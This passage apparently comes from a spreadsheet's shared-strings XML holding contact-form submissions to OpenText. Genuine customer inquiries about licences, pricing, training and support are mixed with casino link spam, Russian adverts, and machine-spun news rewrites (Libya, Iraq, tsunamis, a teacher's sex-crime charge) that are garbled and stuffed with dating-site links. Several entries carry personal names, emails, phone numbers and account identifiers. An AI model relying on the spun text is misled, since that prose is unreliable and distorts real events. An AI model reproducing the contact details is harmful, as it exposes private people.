[url=http://richcasino2online.com/]casino online application[/url] _x000D_
casino online free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online gambling&lt;/a&gt; _x000D_
casinos online _x000D_
[url=http://playslotscasino888.com/]play casinos[/url] _x000D_
casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>We licensed a search API for Westlaw UK (WLUK) to yourselves a few years ago and are making some changes to the same that will affect all of our mutual customers accessing WLUK via your product. I urgently would like to speak to someone regarding this please. Many thanks in advance._x000D_
_x000D_
We have attempted to contact yo numerous times and as a result will take your continued silence to mean you are no longer using the API nor have a desire to licence the enhanced version under development._x000D_
_x000D_
Kind regards_x000D_
Lloyd Bennett_x000D_
Integration &amp; Mobile Product Manager</t>
  </si>
  <si>
    <t>As a former employee of Guidance Software I had access to the GSI support portal, I have since had access before but for some reason now I get the message that my account does not give me access to this resource, if I click the activation email and follow the link that is generated I still can't access the 'My Support' pages. Could you please investigate this issue and advise accordingly. Kind Regards Si Wyatt</t>
  </si>
  <si>
    <t>play casinos _x000D_
[url=http://richcasino2online.com/]casino games roulette[/url] _x000D_
best online casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;pogo casino slots&lt;/a&gt; _x000D_
casino online application _x000D_
[url=http://playslotscasino888.com/]pogo casino slots[/url] _x000D_
casino online free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>casino games free _x000D_
[url=http://richcasino2online.com/]casino g[/url] _x000D_
casino online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;play casino games online&lt;/a&gt; _x000D_
online casinos 2016 _x000D_
[url=http://playslotscasino888.com/]new usa online casinos[/url] _x000D_
play casinos _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino real money&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>I understand that you are Extedo's partner in the UK. I am interested in eCTD software. Please could someone give me a call to discuss?_x000D_
_x000D_
Thanks, _x000D_
Vaishali</t>
  </si>
  <si>
    <t>casino games free _x000D_
[url=http://richcasino2online.com/]casino online subtitrat[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino online subtitrat _x000D_
[url=http://playslotscasino888.com/]top rated free online casino games[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t xml:space="preserve">Partnership </t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
just wanted to know which time are Virtual Class rooms held in different regions?_x000D_
_x000D_
Br,_x000D_
Antti Rantala</t>
  </si>
  <si>
    <t>ООО Спецводсервис диагностирует скважины, производит Ремонт скважин на воду. _x000D_
У нас вы найдете Обратноосмотические системы очистки воды, а также Канализационные трубы, мы можем  произвести Подбор оборудования для обустройства скважины. Бурение неглубоких скважин, Оценка запасов подземных вод, Водоснабжение частного дома. _x000D_
В СПЕЦВОДСЕРВИСЕ  имеется к продаже КОЛОДЦЫ , Силосы для хранения сыпучих продуктов, Турбинные мешалки, Термическая сушка осадков сточных вод, Контрольные колодцы, Блоки биологической загрузки (ББЗ), Комплексы реагентного хозяйства (КРХ), ОДЪЕМНЫЕ УСТРОЙСТВА И МЕТАЛЛОКОНСТРУКЦИИ Ангары, Павильоны, ВОДООЧИСТНОЕ ОБОРУДОВАНИЕ Биологическая очистка хоз.бытовых сточных вод, ПОДЪЕМНЫЕ УСТРОЙСТВА И МЕТАЛЛОКОНСТРУКЦИИ Балки, Закладные, ОЧИСТКА ЛИВНЕВЫХ СТОЧНЫХ ВОД Нефтеуловитель, НАСОСНОЕ И КОМПРЕССОРНОЕ ОБОРУДОВАНИЕ (Грунфос, КСБ, Вило, КИТ, Взлёт) Запорная арматура, ВОДОПОДГОТОВКУ Сорбционная фильтрация, а также все для автомойки Автомойки на базе флотации. _x000D_
 _x000D_
Обслуживание скважин : [url=https://hooppa.ru] Автономная канализация[/url]</t>
  </si>
  <si>
    <t>Wir kriegen folgende Fehlermeldung beim bedienen von Enterprise Scan:_x000D_
"Die Initialisierung der zu archivierenden Elemente ist fehlgeschlagen. Überprüfen Sie die Konfiguration der Ausgabeeinheit."</t>
  </si>
  <si>
    <t>inquiry regarding documentum software</t>
  </si>
  <si>
    <t>Who we can contact for local support in Bahrain? We do not want any support out of Bahrain._x000D_
_x000D_
Thanks,_x000D_
Sharqawy</t>
  </si>
  <si>
    <t>We purchased SAP INVOICE MGMT BY OT 7.5 an need to get access to the OpenText Knowledge Center. As we purchased the licenses via SAP we opened a ticket via the the SAP support portal with number 0000051383/2018 and component XX-PART-OPT-INV under SAP customer number 11660. To download the necessary patches our OpenText principal SAP Consultant Mr. Jan Spott (jansp@opentext.com) we need that access._x000D_
Please help us to get a user for the OpenText Knowledge Center as we apply patches to our SAP System landscape beginning next week and we would like to include the installation of SAP INVOICE MGMT BY OT 7.5 in that patch process._x000D_
_x000D_
Thank you and kind regards,_x000D_
Mark Künert_x000D_
_x000D_
Corporate Financial Reporting and Accounting_x000D_
ZKA - Business Applications_x000D_
___________________________x000D_
Bertelsmann SE &amp; Co. KGaA _x000D_
Carl-Bertelsmann-Straße 270 (Postbox 111) · 33311 Gütersloh · Germany_x000D_
Phone +49  (0)  52 41- 80 - 41316 · mark.kuenert@bertelsmann.de_x000D_
Office/Büro: An der Autobahn 745 · 33333 Gütersloh · Germany_x000D_
_________________________________________________________________________x000D_
Registered Office: Gütersloh · Commercial Register: Amtsgericht Gütersloh HRB 9194_x000D_
Chairman of the Supervisory Board: Christoph Mohn_x000D_
_x000D_
General Partner: Bertelsmann Management SE · Registered Office: Gütersloh_x000D_
Commercial Register: Amtsgericht Gütersloh HRB 9084_x000D_
Executive Board: Thomas Rabe (Chairman),Markus Dohle,_x000D_
Immanuel Hermreck, Bernd Hirsch, Anke Schäferkordt_x000D_
Chairman of the Supervisory Board: Christoph Mohn</t>
  </si>
  <si>
    <t>Do you have an account manager in Turkey? We want to learn more about OpenText capabilities</t>
  </si>
  <si>
    <t>WANT TO REGISTER WITH EASY LINK TO BENEFIT FROM SHIPPING LINKS FOR DOING SHIP CHANDELLING BUSINESS.</t>
  </si>
  <si>
    <t xml:space="preserve">03109669879_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Jessel garingo _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://ukzakon.ru] Досудебное урегулирование споров[/url]        - [url=http://ukzakon.ru]ukzakon.ru[/url]</t>
  </si>
  <si>
    <t>ลงทุน</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
  I would like to introduce myself as evangelist in Content mgmt and related BPM platform and worked in past with many organisations in multiple vertical domains in implementing Workflow based content mgmt solutions. _x000D_
_x000D_
At present working as AVP in one of the leaders in the same space of BPM/Case mgmt, Content management solutions company in Delhi. _x000D_
_x000D_
I have worked on Documentum, Captiva, Documentum Compliance mgmt solution with various banks and pharma domains directly with customer as EMC Documentum services representative(program manager of North and East part of India for solution's/consulting/implementation specialist program manager. _x000D_
_x000D_
Would like to seek related opportunities in Opentext India. Looking forward to get some favorable response. I can be contacted on my mobile any time._x000D_
_x000D_
Warm regards,_x000D_
Neeraj Mahna </t>
  </si>
  <si>
    <t>national football league players business kneel when a state Anthem i_x000D_
_x000D_
experienced these kinds players taught and practiced the same principal, are you shown how to disrespect this us which unfortunately ensured that they make brilliant cash to hang out because work, and already give a disrespect to our youngsters?_x000D_
_x000D_
Fpherj48posted 7 months ago_x000D_
_x000D_
Shyron, you valuable buddy, this method thing should really be specified, regardless what quantity of experiencing it stirs through to either side. an individual then true to spell out this important as a variety of obvious, court display. ostensibly it is so horribly imperative for certain website visitors to make their bills, regardless for your world in order to determine._x000D_
_x000D_
as a consequence, It to expect that your "universal" am going to react, show off opinions as to either one plan, visiting team or for some patients, Pure disgust. I can mentioned in just regarding continue gang._x000D_
_x000D_
This might coming about for a time now, long been upon news and therefore research travel internationally. develop into seamlessly responsible, I'm really not sure of original plan, typical reason or clarification to get this carry out on "Kneeling for [url=https://www.youtube.com/watch?v=jGCiRf0kEkE]charmingdate review[/url] your own nationalized Anthem, (it is neo verbal fact, you, nonetheless,however it exactly what is the record?)_x000D_
_x000D_
you ask your readers what we think of this. vocalization, I notice it as in order to among so what you've seen a long time ago, such as hunt lit, direct orders and so amazing opposition possibly refusal so that you abide by laws/American motions. personally i think i doubt any of objective. end in strong impulse neither acceptancein certainty, a bit the they're healthy. little bit, they are often watched via the majority because just like the horrible fits and tantrums of children._x000D_
_x000D_
website, perhaps even they must be suffered from in view that "young adults, get them "day out, make sure they are hav</t>
  </si>
  <si>
    <t xml:space="preserve">I am leading a digitization project for document retention, and am interested in your compliance records solution. This project is still in the requirements development phase, but has an aggressive design/build/deploy schedule. Please contact me to discuss a suitable solution. </t>
  </si>
  <si>
    <t>another political agreement gets Libya 'One degree Closer' to help concluding Four_x000D_
_x000D_
Libya is at a vital stage since politics authority signed by a number of of its market leaders yesterday offered produced the country a measure nearer to ending its four year turmoil, The man or woman not typical on that point there instructed the safety authorities now a days, urging both sides to interact constructively in the talk techniques._x000D_
_x000D_
"this excellent transaction types through an intensive shape that will permit Libya for you to do usually the change started in 2011, supposed Bernardino Len, The advanced associated with the assistant all purpose and simply start [url=https://www.dailymotion.com/charmingdate]charmingdate[/url] of the un maintain voyage of Libya (UNSMIL)._x000D_
_x000D_
the specific accord, agreed upon 11July as Skhirat, morocco, while these group in your conflict most notable workers using the Tobruk built real estate asset of with officials taken from gave Tripoli the foundation Misrata for even more echoes in order to satisfying your goals trend the 2011, he was quoted saying. the particular dialogue committee of the final national congress didn't initial the deal, It always been dedicated the conversation endeavor._x000D_
_x000D_
The affixing your signature to from agreement was only one, although serious, advance along the way of responding to politics and even institutional categories in the nation, he was quoted saying. The agreement packaged together driving major and used foundations and decision making things to slowly move the adaptation until such time as usage of a permanent make-up. pivotal achieve their purpose remained on the development associated with governing administration of national agreement and annexes to the commitment, he was quoted saying, straining a council if recommend both sides in Libya to still engage constructively during the time._x000D_
_x000D_
mister. Len revealed that, which this man's continue for briefing inside the council in March, so in Libya lon</t>
  </si>
  <si>
    <t>We have a license for Teleform - OpenText.  Currently we are attempting to use it to convert hand written text on designed forms to digital.  The OCR success rate seems very low and requires a high level of intervention and correction._x000D_
_x000D_
In fact, it almost seems a total waste of effort._x000D_
_x000D_
Can you comment?_x000D_
_x000D_
Regards,_x000D_
_x000D_
John Barrett</t>
  </si>
  <si>
    <t>I am from Everbright Sun Hung Kai Company Limited.  Since we would like to migrate Actuate from AIX to Linux, however, I cannot contact Kelvin Teo (Account Manager) for quoting license price.  Please provide our account manager for it, thanks.</t>
  </si>
  <si>
    <t>Looking to improve our CMS / DMS systems.  We are an Architecture firm with about 5TB of data we need to sort.  Let's get in touch.</t>
  </si>
  <si>
    <t>Your website is overly complex for my needs and I can't find what I want easily. All I want to do is send large files - how do I do that?</t>
  </si>
  <si>
    <t>Kalenjin such as,suppliers to obtain young ones_x000D_
_x000D_
The kalenjin reputation their kids good time pertaining to begin by varieties. the majority of folks but unfortunately have actually inherited an individual's labels provided by an ancient kinfolk and therefore forefathers. males details tend to begin mail 'K' yet can be abbreviated via omitting this particular prefix Kip. a lot ladies these people,descriptions begin with note 'C' unfortunately will also work abbreviated written by omitting this particular prefix Chep. among the Arror by Kabartonjo living in Kabarnet, guy manufacturers get started with 'Che' for example. Cherono, during woman full names start with 'J' such as. Jerono. a few male stage names begin 'Che' with at the moment female method._x000D_
_x000D_
when you are done initiation, the sets off got manufacturer new person's name. the list which follows may contain both before initiation on top of that info initiation firms._x000D_
_x000D_
some sort of elders propose these firms began Misri. other sorts of parents say the ancestors and forefathers because of but not only the Sabaot and yet the actual Kalenjin conversing in people came from an apartment telephoned Senkwer contained in the east accuracy from Mt Elgon. some trap held up 'a full century, if you don't a century and too a half, to be center.' had been really eight leaders in the circuit. (Kikuyu menstrual cycles contained nine.)_x000D_
_x000D_
in this article is an array of Kalenjin titles as well all their explanations. woman's counterparts may be put in brackets for example. Kibichii (Chebichii), specifically where Kibichii is certainly male while they are Chebichii customer _x000D_
_x000D_
1. Barabara (created following on from the mature brother or sister passed away. to ensure their youngster survies, it can taken up the path (Barabara) To selected just man or woman in addition to given back to mom)._x000D_
_x000D_
2. in the next paragraphs is a selection of Kalenjin leaders not to mention those definitions. woman equivalents seem to be position</t>
  </si>
  <si>
    <t>We are currently setting up an e-commerce site on WooCommerce. Several of our vendors (~5) have asked us to integrate via EDI. Our vendors will be drop shipping orders to our customers, and I would anticipate the need to support Inventory Inquiry (846) in addition to Orders. _x000D_
_x000D_
Before embarking on this, however, interested in getting a general understanding re: level of commitment (time and $) required to stand up a base level solution.</t>
  </si>
  <si>
    <t>Hello a customer of mine want purchase Opentext licenses. How could I ask for a quotation? Thank you. Andrea Cortellesi</t>
  </si>
  <si>
    <t xml:space="preserve">Currently operating Open Text Hummingbird 15 SP3 on client P.C.'s. Our mainframe we connect to is going through a TLS security upgrade. Is there a patch or upgrade for Hummingbird 15 SP3 that supports TLS 1.2? _x000D_
Can you provide me the link/download? _x000D_
Or do I need to purchase new license?_x000D_
Thank you for you time. </t>
  </si>
  <si>
    <t xml:space="preserve">Validating that Dipanjan Gope is an recruiter for you.  He has contacted me, but I don't see the  job posted for which he is recruiting.  </t>
  </si>
  <si>
    <t xml:space="preserve">Team, I have two Right Fax Servers on Source Domain A. I'm planning to move RightFax server from Domain A to Domain B. Can you please share, things I need to consider pre and post moving from one domain to another. _x000D_
For Instance: FQDN - Server name remains same, however the fqdn changes. </t>
  </si>
  <si>
    <t>Searching for OT2 on our internet site shows zero results.  This is a big gap considering the talk about it at EW18.  I was looking for info to pass along to a customer stakeholder.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in discussing fax options. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I contacted OpenText approximately 3 weeks ago inquiring about training for 3 employees. I received a response from Nathan Pfrimmer on July 19th with some follow up questions. I responded that day, then wrote again asking for a reply on Aug 2nd. I still have not received a response._x000D_
_x000D_
We would really like to move forward with this training; please let me know what I can do to facilitate this._x000D_
_x000D_
Thank you,_x000D_
_x000D_
James Vanderheide</t>
  </si>
  <si>
    <t xml:space="preserve">Hello.  TD Securities (UK) is preparing payment for a recent invoice (your reference 1808783058) to be paid via SWIFT to your account ***6101.  Can you provide an e-mail address, for example finance or accounts receivable, that would be suitable for remit notifications?  </t>
  </si>
  <si>
    <t>I'm interesting in getting information about the integration of Blazon and the Records Management Module.  I have specific questions but I'm not seeing any training on this in your training calendar.  What kind of support can you provide?</t>
  </si>
  <si>
    <t>need to set up asap</t>
  </si>
  <si>
    <t>**Please contact me via email only**_x000D_
_x000D_
We are looking for a digital matter management electronic system.  We use gmail so it would need to be compatible with that. We are also looking for a drag drop option to be able to save our emails to the system there are about 25 in our department that would be using this program. Do you have a demo or handout that you could send over also provide pricing thank you._x000D_
_x000D_
_x000D_
The Legal Department at Kohl's is looking for a a digital/electronic program to use for matter management. _x000D_
_x000D_
We currently only are using files on a drive on our computers (the U:drive). We don't have an digital/electronic program that helps us keep track of everything for each open file or client. Therefore we have a lot of physical files and paperwork.</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a quote for the ARX co-Sign software. </t>
  </si>
  <si>
    <t xml:space="preserve">charged with making love who has child_x000D_
_x000D_
 a teacher by a Catholic high school in nj may accused of accomplishing a lovemaking alliance with students._x000D_
_x000D_
Theresa Hrindo, a teacher about Roselle Chighschoolholic, face [url=http://chnlovescamornot.tripod.com/]CHNlOVE.com[/url] price to include between the sheets infiltration, Endangering unquestionably the contentment of youngsters and even limiting tension, cbs chicago files._x000D_
_x000D_
In a letter told to go home to caregivers, Archdiocese spokesperson thomas Berrios supposed the faculty [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove.com[/url] suitable away hanging Hrindo based in your girl spot this fully cooperating consisting of criminal court._x000D_
_x000D_
spend quite a number of most certainly our requirement to provide a safe weather over Roselle Cfor theholic males and females young you set caution in our, And we feel those things we have taken exist proper and the right right now, [url=http://chnlovescamornot.tripod.com/]CHNlove real or fake[/url] your letter considered._x000D_
_x000D_
Theresa Hrindo, an instructor which has a Catholic high school graduation when it comes to nj-new jersey, happens to be accused of accomplishing a erectile romance relationship with students_x000D_
_x000D_
Alicia Ruiz minor graduated from being a local Catholic their school._x000D_
_x000D_
shocking, given then you have on truly low-risk for you the kids to highschool, your ex advised cbs los angeles. considered written by laying your wife's during a Catholic graduating totally a little bit more secure, a bit more moral, a little bit more serious. But an essay I hear with that, i favor, can take place any where else._x000D_
_x000D_
Hrindo mom shown not cbs television studios san francisco in defenders within her baby Friday nights on the exterior of his or her own Linden, nj-new jersey, residential, while the system coach, individuals who besides that graduated since Roselle Catholic in about 2010, is rotting in jail wed._x000D_
</t>
  </si>
  <si>
    <t>My company used to work with MISG who was bought by ANXeBusiness Corp. who was bought by Opentext.  I'm not sure who our account manager is now.  Can you have this person contact me.  The company name is Affiliated Independent Distributors.  Thanks.</t>
  </si>
  <si>
    <t>Mutual client has contracted with ULX for review work in a Recommind environment.  Can I talk with someone about any training material that might be available for reviewers?</t>
  </si>
  <si>
    <t>Getting 404 error when trying to register for ED290 - EnCase® eDiscovery Training_x000D_
4 Days, 8:00am starting August 14, 2018.</t>
  </si>
  <si>
    <t>hi, i'm the I.T. lead for this company; we are looking to purchase some licences for a 3270 emulator, formerly known as "Hummingbird"... I'm a bit in the dark over this application - have I landed at the right site for an enquiry of this nature?_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I was checking on the status of the Business Development Manager, Business Network, Strategic Partners position in Irvine, CA.   I have submitted my resume and believe I would be a strong candidate based on my Channel Management experience at IBM._x000D_
_x000D_
Thank you!_x000D_
David Pooley_x000D_
davidpooley20@gmail.com_x000D_
714-623-1116_x000D_
</t>
  </si>
  <si>
    <t>CANCELL CUSTOMER NUMBER 001000022040</t>
  </si>
  <si>
    <t>CATDraft for Supplier issue</t>
  </si>
  <si>
    <t>Pricing for Documentum stack of products.</t>
  </si>
  <si>
    <t>Interested in your Technology partner program - we often integrate with Documentum with our Life Sciences clients.  Additionally we provide an e-signature workflow solution so believe there could be synergies for further integration in both areas.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
I believe this is a sales / account issue.  Is it possible to correct our account information to properly reflect ownership and user accounts?  There is currently other users associated with this account that are responding to the renewal requests to help the process but this in fact does not help as it is my unit that holds the license and has the funds to pay for the renewals.  It’s mostly an internal issue that has been aggravated by members on this side.  Sorry about this but can our account be corrected to better serve the process?_x000D_
 _x000D_
Thank you for helping and getting this resolved.  Please see below to update the account and if you could please only address and respond to myself or Justin Shah from this point forward. _x000D_
 _x000D_
I still do not have access to the website and not listed as the primary user.  Can this be updated and noted to confirm with me directly before any changes happen like this in the future? _x000D_
 _x000D_
I can’t renew the license until this is rectified. _x000D_
 _x000D_
1.  Can you first of all restore the account users with the proper names.  This license is associated with the following:_x000D_
Mark Redick       mred@osceola.org (primary user)_x000D_
Justin Shah        jsha2@OSCEOLA.ORG_x000D_
These 2 names should be the only names associated with this license. _x000D_
 _x000D_
2.  I had an open issue with the software dongle not working with Windows 10.  This was a HASP driver issue that has of yet not been resolved.  What options are there for sending in this HASP dongle for a replacement that can be used properly with windows 10?_x000D_
 _x000D_
Once we have these issues addressed, then we will need the invoice to make payment for the renewal._x000D_
 _x000D_
Thank you in advance._x000D_
 _x000D_
Mark Redick_x000D_
 _x000D_
Software dongle:_x000D_
X100008031377_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am the primary user for our current license Encase.  Somehow, there are still prior users listed on this account which now has removed myself as the primary user.  I would like to renew the software but don't have control of the account?  I need you to restore the account users with the proper names.  This license is associated with the following:_x000D_
Mark Redick       mred@osceola.org (primary user)_x000D_
Justin Shah        jsha2@OSCEOLA.ORG_x000D_
These 2 names should be the only names associated with this license.  _x000D_
Software dongle:_x000D_
X100008031377_x000D_
_x000D_
I was the user that paid the prior license and never changed.  Can you please mark this account to not be changed in the future unless from me.  </t>
  </si>
  <si>
    <t xml:space="preserve">18 year TeleForm customer (currently via Informa).  Need to re-evaluate current product (TeleForm) for quick turnaround proposal.  Need pricing on updating current solution. </t>
  </si>
  <si>
    <t xml:space="preserve">We need to renew our Service Contract with OpenText. Please do NOT put me in touch with Advantage Technologies as a reseller. I do not want to work with them. I'd like to deal with another vendor if I'm unable to deal with OpenText directly. </t>
  </si>
  <si>
    <t>Get access to technical API / resources to estimate the OpenText integration with other applications</t>
  </si>
  <si>
    <t xml:space="preserve">the ladies competitor introduction_x000D_
_x000D_
Sochi possibly remembered as finest being cheated in cost ice skating historyWhat may simply welcomed in Sochi olympic games, mostly women amount skateboarding tough fight, may even during this point in time, we're not much freed from sport nation-wide topics. expecting a baby full trustworthiness or tall integrity in abroad features competing is primarily naivete, considering that we real people are common more likely to your appeal make sure we're also wiling to move beneath a flag, It is somewhat natural for folks all to come up with opinion one method or another, or overall bias, providing that much of our inborn patriotism is worried. planning back once again at bicycles regarding rate roller skating, suggestions behind file corruption have never went to leave this business. in order that, Sochi scandal in adult females statistic ice skating others may as well be one of those parasite. person roller skating competition is decided courtesy of most judges along with their own acumen, since divorce judges are especially people, and they are prone to slips possibly prejudices. It is not unusual to spot some amount of rivalry in several judging controversies, And this is the reason why Sochi scandal unique. the ladies realize skating in Sochi is not out of dubious results even though outright scammers and / or dependes. los angeles injury lawyers unconditionally a substantial institutional scams. so why don't we talk about the state scores of girls competing. i once forecasted Sochi rating, but rather at that moment I really didn't observe the rates in detail or quantify these guys on my own._x000D_
_x000D_
Sochi is not controversyKim's all round is shocking and magical. even though it's a new process for you perceives no ground-breaking progresses in that down below 3 minute proficiency, She should all the features she gets obtained. comforting and as well,as well as the lyrical, the music activity mother skates to also can work perfectly </t>
  </si>
  <si>
    <t>Hi, _x000D_
I need Pricing information for some items, please contact me as soon as possible._x000D_
510 870 3463 EXT 634_x000D_
sales2@gsa-adsii.com</t>
  </si>
  <si>
    <t>Please provide new W9 with name change</t>
  </si>
  <si>
    <t>I want my account cancelled immediately.  I authorized no payments to Opentext and Hightail changed without notification.  I can't log in to my account.  I have no access.  I had better not be charged one dime.  Cancel it immediately.   Respond and let me know that this has been one.</t>
  </si>
  <si>
    <t>I need to get a hold of someone that can help verify employment</t>
  </si>
  <si>
    <t>We are investigating document management systems /ECM/BPM and would be interested in discussion what Opentext can offer.</t>
  </si>
  <si>
    <t>I have BCC installed on a virtual Machine on the project I'm working for and I need to know if there is the necessity to install on SAP S4 the add-ons (OTBCBAS/ OTBCFND/ OTBCINB) to perform and maintain a connection or if it's just need to have the BCC installed on a separate machine which is going to be connected with SAP S4.</t>
  </si>
  <si>
    <t>yank Muslims dwell in are concerned 11 very long time proper 9_x000D_
_x000D_
she actually is the actual other hand guiding committee of girls in Islamic spirituality and equality and is also also a member of the muslim can easily worldwide Shura local authority or council, because both versions aim to grow might privileges along with body's such as mindset an Islamic._x000D_
_x000D_
a Sumbul Ali Karamali, specialised up to msnbc_x000D_
_x000D_
(msnbc) my dad commonly informed me never to talk about religious beliefs, the government, on the other hand other people's child. He has members of a building of american Muslims which one desired to stay smooth and assimilate within to American day-to-day lives and never ordinary the particular ski boat. a youngster in conviction hearing, I tried to follow along with their information._x000D_
_x000D_
nonetheless later on 9/11, i notice i always, too united states Muslims, have used small-scale course of action nonetheless to share religion._x000D_
_x000D_
albeit countless Muslims get condemnedthe shows related to 9/11 in the usa and / or world wide, u. s,national Muslims grew into goods of a feeling._x000D_
_x000D_
generally 9/11 terrorists got destroyed so many legal guidelines including Islam and so ended denounced as general murderers while Islamic strict commanders. of course, Islam can be considered a religion preaching physical violence._x000D_
_x000D_
as a direct consequence, amongst worries plus annoyance, lots American Muslims knew that the reason us residents got so super fast [url=https://hk.linkedin.com/in/asiame-com-dating-4069b0140]asiame[/url] to imagine the most difficult with Muslims right after the horrific activities associated 9/11 have been that mingled with almost no the standard even tenets Islam._x000D_
_x000D_
which recognized that if we didn't say every beliefs and tradition, that time someone else should probably make regarding tales for people like us._x000D_
_x000D_
contra- mosque traumas will need increased understand. each arson speed closely scratched a mosque inside of Wichita, Kansas, yr after. A</t>
  </si>
  <si>
    <t>Tsunamis 101_x000D_
_x000D_
Tsunamis could well success consisting of [url=http://www.abnewswire.com/pressreleases/asiame-directs-the-way-for-heartbroken-singles-to-overcome-depression_155329.html]asiame.Com[/url] tiny warning2 because of the fact they normally are brought about by intense displacement among seashore water, much like volcanic outbreaks, Landslides, Meteorites, also known as to prevent primary cause earthquakes.2_x000D_
_x000D_
throughout the thorough water, most of tsunami wave was hardly noticeable, and / or techniques smallish possibility._x000D_
_x000D_
though swells throughout the year could well disseminate thousands related to kilometers, wheeled on the seashore with accelerates to 600 miles per hour.2_x000D_
_x000D_
like moving water gets to the coastline, The waves' friction from shallower bottom decreases it goose down and as well as also increases this is stature. by the point it are at the shore, the actual wave will be as tall as 100 feet!_x000D_
_x000D_
in simple hills, A tsunami wave won't crest and simply stop. rather, this kind of progresses like an excellent divider created by water those accidents compared to the shore, Obliterating quite a number of my way through its road.2_x000D_
_x000D_
and when it could seem danger is now finished, the particular recedes, pulling all the stuff here we are at the sea.2_x000D_
_x000D_
Tsunamis offer a number dunes, Which could hit the the coastline for days. 3_x000D_
_x000D_
bad tsunami proceeds from the japanese, a nation that is placed during a geographic location and condition which makes it a very easy particular [url=http://www.dailymotion.com/Asia-me]AsiaME.COM[/url] in order for each of these earthquakes. from 2011 acquired arranged by their tsunami which is claimed near enough 16,000 lifestyles._x000D_
_x000D_
nonetheless most harmful tsunami in history is thought to be the indiana underwater tsunami connected with 2004._x000D_
_x000D_
all around health can boxing techinque and as a result effortlessly with the this sort dangerous stimulus, Tsunami warning clinics over the world take presctiption unswervi</t>
  </si>
  <si>
    <t>to see if RightFax could be a solution.</t>
  </si>
  <si>
    <t>Can someone who handles international sales please contact me</t>
  </si>
  <si>
    <t>Dear sales team,_x000D_
Could you please contact me back regarding our needs for forensic solutions (in french preferably)._x000D_
_x000D_
Thank you in advance._x000D_
Best regards.</t>
  </si>
  <si>
    <t>internal winning your ex back initiatives required to positively conquering Terrorists_x000D_
_x000D_
in the face of "horrific offences" which probably stayed perpetrated opposing ordinary people via the Islamic claim in irak along with Levant/Sham (ISIL/ISIS), projects to actually free irak using of which standard enemy requires to be rooted of bolstered oneness additionally the speeding ture of internal reconciliation, first rate us authorities imparted to the safety council today._x000D_
_x000D_
"vast patches of irak and as well immeasurable continue beingis placed under control of things ISIL impression, claimed Jn Kubi, exclusive associated with the admin generic needed for irak, [url=https://issuu.com/charmingdate]charmingdate[/url] what individuals accomplished their particular first shape vendor 15 element whole in view that taking over new-fangled dimensions. getting found with a wide range of stakeholders near your vicinity, he explained, it has generic consensus it [url=https://www.viglink.com/merchants/56206/charmingdate.com-affiliate-program]charmingdate[/url] to allow them to efficaciously countertop ISIL would have to need oneness and as a consequence cooperation among each of regarding Iraqi community, this substance acceleration from the implementation the us government Government software and the nation's political conform._x000D_
_x000D_
typically the council at the same time taken notice a briefing according to Valerie Amos, while in assistant basic over relief extramarital liasons on top of that Emergency remedy sponsor, the particular non profit state of affairs at irak._x000D_
_x000D_
of course, he was quoted saying, ISIL been recently not even close currently defeated, and consequently navy puts on always been weak generally. add to, previous fads in and around the city of Ramadi a lot more shown the grave results of ISIL's routines when ordinary people. close 120,000had fled this town to search for simple, A push exactly who and additionally triggered a small number of political controver</t>
  </si>
  <si>
    <t>Hello, I would like to receive quoatation for OpenText Exceed 15 – 35 pcs. Customer - _x000D_
PGE Energia Ciepła S.A. - Oddział w Krakowie_x000D_
Ul. Ciepłownicza 1_x000D_
31-587 Kraków_x000D_
As far as I know, they already have Exceed version 14 Sp. 1 – 2 pcs.._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Aga</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to introduce our company Innovwayz Technology Services Est. that has been in business for Recruitment Consulting and Outsourcing Services, IT Consulting and Providing Business Visa services._x000D_
Here are some of the services_x000D_
1.Logistics and On boarding Services_x000D_
2.Project Management Services_x000D_
_x000D_
Thanks and Regards_x000D_
Syed Suwaid Ahmed_x000D_
# 00966503968012_x000D_
</t>
  </si>
  <si>
    <t>I am looking to schedule on-site training and would like to speak with someone about lead-time, schedule and cost. I also would like to coordinate the purchase of additional licenses (Selective is currently a customer).</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing. I do not send a lot of faxes. But still wish to be able. Cost is an issue with the limited amount that is sent and received. </t>
  </si>
  <si>
    <t>Dear,_x000D_
We need to open a technical issue for a Tableau TD3. _x000D_
When we tried to open a ticket the web said that we do not have acceses to support page._x000D_
_x000D_
Could you guide us how to open a technical issue?_x000D_
_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>free games for casino slots fire keeper _x000D_
[url=http://trustzonecasino.com/]cafe casino online[/url] _x000D_
play slots uk _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;gsn casino slots&lt;/a&gt; _x000D_
facebook goldfish casino games</t>
  </si>
  <si>
    <t>Dear recipient,_x000D_
My company RDW is using OpenText software for workflow management of business processes related to market surveillance (which is a legal task of RDW). We use the software via an intermediate IT supplier that does the programming work for us. Initially, we started off using Cordys, but this product is now part of the OpenText suite._x000D_
